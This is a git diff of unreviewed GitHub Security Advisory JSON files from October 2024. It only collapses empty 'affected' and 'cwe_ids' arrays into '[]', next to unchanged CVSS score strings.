a/advisories/unreviewed/2024/10/GHSA-h66h-gwq7-wjq2/GHSA-h66h-gwq7-wjq2.json b/advisories/unreviewed/2024/10/GHSA-h66h-gwq7-wjq2/GHSA-h66h-gwq7-wjq2.json index 24d155dd3e4..9ba0e62128b 100644 --- a/advisories/unreviewed/2024/10/GHSA-h66h-gwq7-wjq2/GHSA-h66h-gwq7-wjq2.json +++ b/advisories/unreviewed/2024/10/GHSA-h66h-gwq7-wjq2/GHSA-h66h-gwq7-wjq2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-h72q-rx75-mpgf/GHSA-h72q-rx75-mpgf.json b/advisories/unreviewed/2024/10/GHSA-h72q-rx75-mpgf/GHSA-h72q-rx75-mpgf.json index 697e36114f2..66e65182c19 100644 --- a/advisories/unreviewed/2024/10/GHSA-h72q-rx75-mpgf/GHSA-h72q-rx75-mpgf.json +++ b/advisories/unreviewed/2024/10/GHSA-h72q-rx75-mpgf/GHSA-h72q-rx75-mpgf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-hf9q-vp6q-vfw5/GHSA-hf9q-vp6q-vfw5.json b/advisories/unreviewed/2024/10/GHSA-hf9q-vp6q-vfw5/GHSA-hf9q-vp6q-vfw5.json index 2230e16a323..fcd66a95a50 100644 --- a/advisories/unreviewed/2024/10/GHSA-hf9q-vp6q-vfw5/GHSA-hf9q-vp6q-vfw5.json +++ b/advisories/unreviewed/2024/10/GHSA-hf9q-vp6q-vfw5/GHSA-hf9q-vp6q-vfw5.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-j24x-x8jj-mv7g/GHSA-j24x-x8jj-mv7g.json b/advisories/unreviewed/2024/10/GHSA-j24x-x8jj-mv7g/GHSA-j24x-x8jj-mv7g.json index 1ce6acc2a49..6cc58781037 100644 --- a/advisories/unreviewed/2024/10/GHSA-j24x-x8jj-mv7g/GHSA-j24x-x8jj-mv7g.json +++ b/advisories/unreviewed/2024/10/GHSA-j24x-x8jj-mv7g/GHSA-j24x-x8jj-mv7g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-mjg4-c9jw-rmgw/GHSA-mjg4-c9jw-rmgw.json b/advisories/unreviewed/2024/10/GHSA-mjg4-c9jw-rmgw/GHSA-mjg4-c9jw-rmgw.json index 7690aae729f..420869d1f2e 100644 --- a/advisories/unreviewed/2024/10/GHSA-mjg4-c9jw-rmgw/GHSA-mjg4-c9jw-rmgw.json +++ b/advisories/unreviewed/2024/10/GHSA-mjg4-c9jw-rmgw/GHSA-mjg4-c9jw-rmgw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-mrxf-2x45-jj67/GHSA-mrxf-2x45-jj67.json b/advisories/unreviewed/2024/10/GHSA-mrxf-2x45-jj67/GHSA-mrxf-2x45-jj67.json index 6acf02ba30e..26609360a71 100644 --- a/advisories/unreviewed/2024/10/GHSA-mrxf-2x45-jj67/GHSA-mrxf-2x45-jj67.json +++ b/advisories/unreviewed/2024/10/GHSA-mrxf-2x45-jj67/GHSA-mrxf-2x45-jj67.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-p3cw-2qg8-ghqq/GHSA-p3cw-2qg8-ghqq.json b/advisories/unreviewed/2024/10/GHSA-p3cw-2qg8-ghqq/GHSA-p3cw-2qg8-ghqq.json index d6498561cc3..d745bdca89f 100644 --- a/advisories/unreviewed/2024/10/GHSA-p3cw-2qg8-ghqq/GHSA-p3cw-2qg8-ghqq.json +++ b/advisories/unreviewed/2024/10/GHSA-p3cw-2qg8-ghqq/GHSA-p3cw-2qg8-ghqq.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-p4hq-9rw5-2cwc/GHSA-p4hq-9rw5-2cwc.json b/advisories/unreviewed/2024/10/GHSA-p4hq-9rw5-2cwc/GHSA-p4hq-9rw5-2cwc.json index 0ca4c317b04..29af4fc4db8 100644 --- a/advisories/unreviewed/2024/10/GHSA-p4hq-9rw5-2cwc/GHSA-p4hq-9rw5-2cwc.json +++ b/advisories/unreviewed/2024/10/GHSA-p4hq-9rw5-2cwc/GHSA-p4hq-9rw5-2cwc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-pq4p-r5xh-r7fm/GHSA-pq4p-r5xh-r7fm.json b/advisories/unreviewed/2024/10/GHSA-pq4p-r5xh-r7fm/GHSA-pq4p-r5xh-r7fm.json index 5890469abf7..a8378345267 100644 --- a/advisories/unreviewed/2024/10/GHSA-pq4p-r5xh-r7fm/GHSA-pq4p-r5xh-r7fm.json +++ b/advisories/unreviewed/2024/10/GHSA-pq4p-r5xh-r7fm/GHSA-pq4p-r5xh-r7fm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-pq4q-5j29-p25c/GHSA-pq4q-5j29-p25c.json b/advisories/unreviewed/2024/10/GHSA-pq4q-5j29-p25c/GHSA-pq4q-5j29-p25c.json index abfeefb8b62..0091f7c2961 100644 --- a/advisories/unreviewed/2024/10/GHSA-pq4q-5j29-p25c/GHSA-pq4q-5j29-p25c.json +++ b/advisories/unreviewed/2024/10/GHSA-pq4q-5j29-p25c/GHSA-pq4q-5j29-p25c.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-pvmx-j29h-323g/GHSA-pvmx-j29h-323g.json b/advisories/unreviewed/2024/10/GHSA-pvmx-j29h-323g/GHSA-pvmx-j29h-323g.json index a53e19885a1..bc74c340422 100644 --- a/advisories/unreviewed/2024/10/GHSA-pvmx-j29h-323g/GHSA-pvmx-j29h-323g.json +++ b/advisories/unreviewed/2024/10/GHSA-pvmx-j29h-323g/GHSA-pvmx-j29h-323g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-q97h-2fjm-733c/GHSA-q97h-2fjm-733c.json b/advisories/unreviewed/2024/10/GHSA-q97h-2fjm-733c/GHSA-q97h-2fjm-733c.json index 5297a18e5a5..29db580d699 100644 --- a/advisories/unreviewed/2024/10/GHSA-q97h-2fjm-733c/GHSA-q97h-2fjm-733c.json +++ b/advisories/unreviewed/2024/10/GHSA-q97h-2fjm-733c/GHSA-q97h-2fjm-733c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-qf32-pvhj-vvx7/GHSA-qf32-pvhj-vvx7.json b/advisories/unreviewed/2024/10/GHSA-qf32-pvhj-vvx7/GHSA-qf32-pvhj-vvx7.json index 557d5d37ad1..229e132f347 100644 --- a/advisories/unreviewed/2024/10/GHSA-qf32-pvhj-vvx7/GHSA-qf32-pvhj-vvx7.json +++ b/advisories/unreviewed/2024/10/GHSA-qf32-pvhj-vvx7/GHSA-qf32-pvhj-vvx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-r4v9-v8c5-298p/GHSA-r4v9-v8c5-298p.json b/advisories/unreviewed/2024/10/GHSA-r4v9-v8c5-298p/GHSA-r4v9-v8c5-298p.json index a643a1d5de4..277fa2db967 100644 --- a/advisories/unreviewed/2024/10/GHSA-r4v9-v8c5-298p/GHSA-r4v9-v8c5-298p.json +++ b/advisories/unreviewed/2024/10/GHSA-r4v9-v8c5-298p/GHSA-r4v9-v8c5-298p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-r56q-rrpj-wqj3/GHSA-r56q-rrpj-wqj3.json b/advisories/unreviewed/2024/10/GHSA-r56q-rrpj-wqj3/GHSA-r56q-rrpj-wqj3.json index e0b8a297ad1..2735db475d3 100644 --- a/advisories/unreviewed/2024/10/GHSA-r56q-rrpj-wqj3/GHSA-r56q-rrpj-wqj3.json +++ b/advisories/unreviewed/2024/10/GHSA-r56q-rrpj-wqj3/GHSA-r56q-rrpj-wqj3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-r83m-8j4j-wqgc/GHSA-r83m-8j4j-wqgc.json b/advisories/unreviewed/2024/10/GHSA-r83m-8j4j-wqgc/GHSA-r83m-8j4j-wqgc.json index 9b00e4458ce..c6924627165 100644 --- a/advisories/unreviewed/2024/10/GHSA-r83m-8j4j-wqgc/GHSA-r83m-8j4j-wqgc.json +++ b/advisories/unreviewed/2024/10/GHSA-r83m-8j4j-wqgc/GHSA-r83m-8j4j-wqgc.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-rxh5-jm9f-fmwj/GHSA-rxh5-jm9f-fmwj.json b/advisories/unreviewed/2024/10/GHSA-rxh5-jm9f-fmwj/GHSA-rxh5-jm9f-fmwj.json index e9c4e96fe9f..3ea3c3d8766 100644 --- a/advisories/unreviewed/2024/10/GHSA-rxh5-jm9f-fmwj/GHSA-rxh5-jm9f-fmwj.json +++ b/advisories/unreviewed/2024/10/GHSA-rxh5-jm9f-fmwj/GHSA-rxh5-jm9f-fmwj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-v876-7vq8-2gf7/GHSA-v876-7vq8-2gf7.json b/advisories/unreviewed/2024/10/GHSA-v876-7vq8-2gf7/GHSA-v876-7vq8-2gf7.json index 61cfdd5e5e7..9d7b6173fda 100644 --- a/advisories/unreviewed/2024/10/GHSA-v876-7vq8-2gf7/GHSA-v876-7vq8-2gf7.json +++ b/advisories/unreviewed/2024/10/GHSA-v876-7vq8-2gf7/GHSA-v876-7vq8-2gf7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-vwf3-qcp6-vhcp/GHSA-vwf3-qcp6-vhcp.json b/advisories/unreviewed/2024/10/GHSA-vwf3-qcp6-vhcp/GHSA-vwf3-qcp6-vhcp.json index e7baeb24f9b..b96a1c49de1 100644 --- a/advisories/unreviewed/2024/10/GHSA-vwf3-qcp6-vhcp/GHSA-vwf3-qcp6-vhcp.json +++ b/advisories/unreviewed/2024/10/GHSA-vwf3-qcp6-vhcp/GHSA-vwf3-qcp6-vhcp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-vx2g-7gg2-2q26/GHSA-vx2g-7gg2-2q26.json b/advisories/unreviewed/2024/10/GHSA-vx2g-7gg2-2q26/GHSA-vx2g-7gg2-2q26.json index 500d211c9e4..75f8ee67ce5 100644 --- a/advisories/unreviewed/2024/10/GHSA-vx2g-7gg2-2q26/GHSA-vx2g-7gg2-2q26.json +++ b/advisories/unreviewed/2024/10/GHSA-vx2g-7gg2-2q26/GHSA-vx2g-7gg2-2q26.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-wccr-cp5j-5ggc/GHSA-wccr-cp5j-5ggc.json b/advisories/unreviewed/2024/10/GHSA-wccr-cp5j-5ggc/GHSA-wccr-cp5j-5ggc.json index 8e89e1c8df6..ca7db032c3c 100644 --- a/advisories/unreviewed/2024/10/GHSA-wccr-cp5j-5ggc/GHSA-wccr-cp5j-5ggc.json +++ b/advisories/unreviewed/2024/10/GHSA-wccr-cp5j-5ggc/GHSA-wccr-cp5j-5ggc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-wrwp-h7qf-jwgj/GHSA-wrwp-h7qf-jwgj.json b/advisories/unreviewed/2024/10/GHSA-wrwp-h7qf-jwgj/GHSA-wrwp-h7qf-jwgj.json index 041c42a3f18..713f0cbad5a 100644 --- a/advisories/unreviewed/2024/10/GHSA-wrwp-h7qf-jwgj/GHSA-wrwp-h7qf-jwgj.json +++ b/advisories/unreviewed/2024/10/GHSA-wrwp-h7qf-jwgj/GHSA-wrwp-h7qf-jwgj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-x5qv-p3pm-x7fg/GHSA-x5qv-p3pm-x7fg.json b/advisories/unreviewed/2024/10/GHSA-x5qv-p3pm-x7fg/GHSA-x5qv-p3pm-x7fg.json index b96e781bd85..d42e328dafa 100644 --- a/advisories/unreviewed/2024/10/GHSA-x5qv-p3pm-x7fg/GHSA-x5qv-p3pm-x7fg.json +++ b/advisories/unreviewed/2024/10/GHSA-x5qv-p3pm-x7fg/GHSA-x5qv-p3pm-x7fg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY",